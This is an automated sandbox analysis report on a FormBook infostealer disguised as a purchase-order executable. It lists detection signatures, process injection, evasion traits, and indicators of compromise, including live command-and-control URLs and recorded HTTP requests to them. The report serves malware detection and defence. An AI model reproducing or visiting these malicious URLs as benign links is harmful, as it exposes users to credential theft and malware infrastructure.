Edit tour

Windows Analysis Report
PURCHASE ORDER N0259305-06SN.exe

Overview

General Information

Sample name:	PURCHASE ORDER N0259305-06SN.exe
Analysis ID:	1636906
MD5:	c28dbc0d132d97e07c97c6756572505a
SHA1:	1514f34b3d68bf37521f21b36d6d7fafc22f0080
SHA256:	33774bd8fb57c533fec4aadf210dbbe065237bd2d09a79a3a3b7dc5db11bba41
Tags:	exeuser-lowmal3
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected FormBook

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

PURCHASE ORDER N0259305-06SN.exe (PID: 7856 cmdline: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe" MD5: C28DBC0D132D97E07C97C6756572505A)

svchost.exe (PID: 7872 cmdline: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

BXuFUjm0ZHK4rIZvDMH.exe (PID: 2424 cmdline: "C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\PCOslFxAYY.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

HOSTNAME.EXE (PID: 5836 cmdline: "C:\Windows\SysWOW64\HOSTNAME.EXE" MD5: B1C51FED46434CF91E65C7B605F8EF3A)

BXuFUjm0ZHK4rIZvDMH.exe (PID: 5564 cmdline: "C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\Wi0U6xJt0tCp.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 1384 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.1491941126.0000000002F60000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1490919657.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3619572646.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3620847794.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3619265503.0000000000870000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1492752235.0000000005600000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.3620880215.0000000004730000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe", CommandLine: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe", CommandLine|base64offset|contains: 9, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe", ParentImage: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe, ParentProcessId: 7856, ParentProcessName: PURCHASE ORDER N0259305-06SN.exe, ProcessCommandLine: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe", ProcessId: 7872, ProcessName: svchost.exe

Sigma detected: Suspicious Execution of Hostname

Source: Process started

Author: frack113: Data: Command: "C:\Windows\SysWOW64\HOSTNAME.EXE", CommandLine: "C:\Windows\SysWOW64\HOSTNAME.EXE", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\HOSTNAME.EXE, NewProcessName: C:\Windows\SysWOW64\HOSTNAME.EXE, OriginalFileName: C:\Windows\SysWOW64\HOSTNAME.EXE, ParentCommandLine: "C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\PCOslFxAYY.exe" , ParentImage: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe, ParentProcessId: 2424, ParentProcessName: BXuFUjm0ZHK4rIZvDMH.exe, ProcessCommandLine: "C:\Windows\SysWOW64\HOSTNAME.EXE", ProcessId: 5836, ProcessName: HOSTNAME.EXE

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe", CommandLine: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe", CommandLine|base64offset|contains: 9, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe", ParentImage: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe, ParentProcessId: 7856, ParentProcessName: PURCHASE ORDER N0259305-06SN.exe, ProcessCommandLine: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe", ProcessId: 7872, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PURCHASE ORDER N0259305-06SN.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.xrrkkv.info/6gk2/?Ep=pDWQ31WSmcfT7q5iBJRw6xwlgxZPw8AxCvifTOHJLT3J2OEhQyU0/Pr2SrVLD94yNdd3jMhFz8nSHAGplUvRkZ6bJzppYn4VIOc3iDEobClSHZ4m7htfLDQ=&QV8=tRJt0fePh	Avira URL Cloud: Label: phishing
Source: http://www.2hvve.xyz/9j4s/?Ep=hk9fQU9O4/6vuccNSw35z79A2q7svzcqZi0eMKS5EqG+CJXtWBeEuNktvgGx6bh+KDN3983a/+oCw9qFrgqgPT6SWkl6TuvtU0EEPTbhto9id1SRxveONyo=&QV8=tRJt0fePh	Avira URL Cloud: Label: malware
Source: http://www.zkkv3oae.vip/caz6/?Ep=ZawoI2OQAkkq7f3aP1Q/M+rH64PMLEv9hW/9aQPNm2aH8QZDTNyWHfkSZ/Re2NRRNsj8q9f54Wk2nBQ8XCZdtkQr8S6/aWWA2E17m+aX8/Lakm93a9lyvag=&QV8=tRJt0fePh	Avira URL Cloud: Label: malware
Source: http://www.nhc7tdkp6.live/k6z0/?QV8=tRJt0fePh&Ep=+DmvplHbbsHxj5SA4Up5IFWZi4z3BwhcRrhIVr0qrGELOUyjdwYGiZsTs9fOANno9qVMAJn+eUCBhfFSVALuVjSUKFSK75lcRrqSnZO681Jc5yalEFtl6xU=	Avira URL Cloud: Label: malware
Source: http://www.satoshichecker.xyz/0hyc/?QV8=tRJt0fePh&Ep=UFqSpO+DrOk2iebdO9cHtilCMzXSl1OmKCFS/DYv0xNYn5KFG60xYq8zVFOfvQynQtd0Hpv0u+JfqNO8pf0Qmp66Bs0aAL76qeI0tJvNNoxdlRXsq706dQM=	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: PURCHASE ORDER N0259305-06SN.exe	Virustotal: Detection: 51%			Perma Link
Source: PURCHASE ORDER N0259305-06SN.exe	ReversingLabs: Detection: 65%

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1491941126.0000000002F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1490919657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3619572646.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3620847794.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3619265503.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1492752235.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3620880215.0000000004730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: PURCHASE ORDER N0259305-06SN.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: hostname.pdbGCTL source: svchost.exe, 00000001.00000002.1491377865.0000000002A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1491352144.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 00000009.00000002.3620267073.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: hostname.pdb source: svchost.exe, 00000001.00000002.1491377865.0000000002A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1491352144.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 00000009.00000002.3620267073.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1183753498.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1168849173.0000000003BA0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1171692440.0000000003BA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1492005218.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1390553819.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1392560160.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1492005218.0000000003100000.00000040.00001000.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3621024167.0000000003150000.00000040.00001000.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000003.1491224419.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3621024167.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000003.1493998684.0000000002F9C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1183753498.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1168849173.0000000003BA0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1171692440.0000000003BA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1492005218.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1390553819.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1392560160.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1492005218.0000000003100000.00000040.00001000.00020000.00000000.sdmp, HOSTNAME.EXE, HOSTNAME.EXE, 0000000A.00000002.3621024167.0000000003150000.00000040.00001000.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000003.1491224419.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3621024167.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000003.1493998684.0000000002F9C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: HOSTNAME.EXE, 0000000A.00000002.3621377097.000000000377C000.00000004.10000000.00040000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3619793906.0000000002CEF000.00000004.00000020.00020000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000002.3621067937.0000000002C8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1793932992.000000001DD5C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: HOSTNAME.EXE, 0000000A.00000002.3621377097.000000000377C000.00000004.10000000.00040000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3619793906.0000000002CEF000.00000004.00000020.00020000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000002.3621067937.0000000002C8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1793932992.000000001DD5C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BXuFUjm0ZHK4rIZvDMH.exe, 00000009.00000000.1409614520.000000000070F000.00000002.00000001.01000000.00000007.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000000.1561086163.000000000070F000.00000002.00000001.01000000.00000007.sdmp

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DB445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00DB445A
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DBC6D1 FindFirstFileW,FindClose,	0_2_00DBC6D1
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DBC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00DBC75C
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DBEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00DBEF95
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DBF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00DBF0F2
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DBF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00DBF3F3
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DB37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00DB37EF
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DB3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00DB3B12
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DBBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00DBBCBC
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0088CAC0 FindFirstFileW,FindNextFileW,FindClose,	10_2_0088CAC0

Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 4x nop then xor eax, eax		10_2_00879E70
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 4x nop then mov ebx, 00000004h		10_2_02ED04E8

Networking

Performs DNS queries to domains with low reputation

Source:	DNS query: www.pembukaan.xyz
Source:	DNS query: www.ddvids.xyz
Source:	DNS query: www.2hvve.xyz
Source:	DNS query: www.shibbets.xyz
Source:	DNS query: www.satoshichecker.xyz

Source: global traffic

TCP traffic: 192.168.2.4:50751 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 47.83.1.90 47.83.1.90
Source: Joe Sandbox View	IP Address: 69.57.163.227 69.57.163.227

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DC22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00DC22EE

Source: global traffic	HTTP traffic detected: GET /6gk2/?Ep=pDWQ31WSmcfT7q5iBJRw6xwlgxZPw8AxCvifTOHJLT3J2OEhQyU0/Pr2SrVLD94yNdd3jMhFz8nSHAGplUvRkZ6bJzppYn4VIOc3iDEobClSHZ4m7htfLDQ=&QV8=tRJt0fePh HTTP/1.1Host: www.xrrkkv.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /caz6/?Ep=ZawoI2OQAkkq7f3aP1Q/M+rH64PMLEv9hW/9aQPNm2aH8QZDTNyWHfkSZ/Re2NRRNsj8q9f54Wk2nBQ8XCZdtkQr8S6/aWWA2E17m+aX8/Lakm93a9lyvag=&QV8=tRJt0fePh HTTP/1.1Host: www.zkkv3oae.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /h6w2/?Ep=UCwWSM3nRx2p3h9Cl4fXZA689LR/VvJAfqyxoOOuZdW9AxGVco4phG7fCi4unkTlPSeGfOFMA2ar2D3yASGNlnnD/o2rwYbFGNasoRCZiC/adgJmkQspbp0=&QV8=tRJt0fePh HTTP/1.1Host: www.btbjpu.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /0bn4/?Ep=SYr/NPlxL88crzao9sEzVFAan/sppp4Spaz6ny0u/wQ4hiaKkBRNpjh7/TKEp8x+PVrjbxLZJhuaHvHa9eVKOjCClcXuDUjYP92CAg4BoEntsUbyfPoFR5c=&QV8=tRJt0fePh HTTP/1.1Host: www.christmas-goods.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /8e17/?Ep=rW7hLScnffKFcdhZF/LNP+YNwLK2zEHab1Dlv2OjG5QW8bBr/Rdb8Z+4xbzU8F62pAFaxoZdEtjwEty2d4vWWL+VN+ZPDmH/dWi0vFakELFuK4FRLkBx9k8=&QV8=tRJt0fePh HTTP/1.1Host: www.ddvids.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /k6z0/?QV8=tRJt0fePh&Ep=+DmvplHbbsHxj5SA4Up5IFWZi4z3BwhcRrhIVr0qrGELOUyjdwYGiZsTs9fOANno9qVMAJn+eUCBhfFSVALuVjSUKFSK75lcRrqSnZO681Jc5yalEFtl6xU= HTTP/1.1Host: www.nhc7tdkp6.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /unmb/?Ep=ED+2iTGcn3FnC5Yu3VU5Al8+QjRKkeN8VmRw3QlO32MfqLvo3mJ0tLvm1A+QKVzhPZXB7LJmEKK99BbGpF5F+Bo9wM+vKeoMY+oBjsoZybkIcGD51iU/mtk=&QV8=tRJt0fePh HTTP/1.1Host: www.brispere.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /ksev/?Ep=6PqoeIz1qxI2aTpZDhgp5yIhp89owzlD/+ru47sSOC6rnihfFEpVxh4euRWPkhT1OB/Z0sX66AXuMPycn/4xr96rgJ1GVfc9z4eE8stzQGAo8+xZROldEaQ=&QV8=tRJt0fePh HTTP/1.1Host: www.stellaritemvault.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /9j4s/?Ep=hk9fQU9O4/6vuccNSw35z79A2q7svzcqZi0eMKS5EqG+CJXtWBeEuNktvgGx6bh+KDN3983a/+oCw9qFrgqgPT6SWkl6TuvtU0EEPTbhto9id1SRxveONyo=&QV8=tRJt0fePh HTTP/1.1Host: www.2hvve.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /l01w/?Ep=IStlWKGZBbL9Gqu4/pkvxy3SKu7eOiNC4GB0OPmgC+p9vaOxVt6rMzsaxt2VKxkE2SHyx7kpbVG5WVuWe6/YcnCZ4Hngmgdd2lhlOq7SvJt3OUyMgBrGQwE=&QV8=tRJt0fePh HTTP/1.1Host: www.shibbets.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
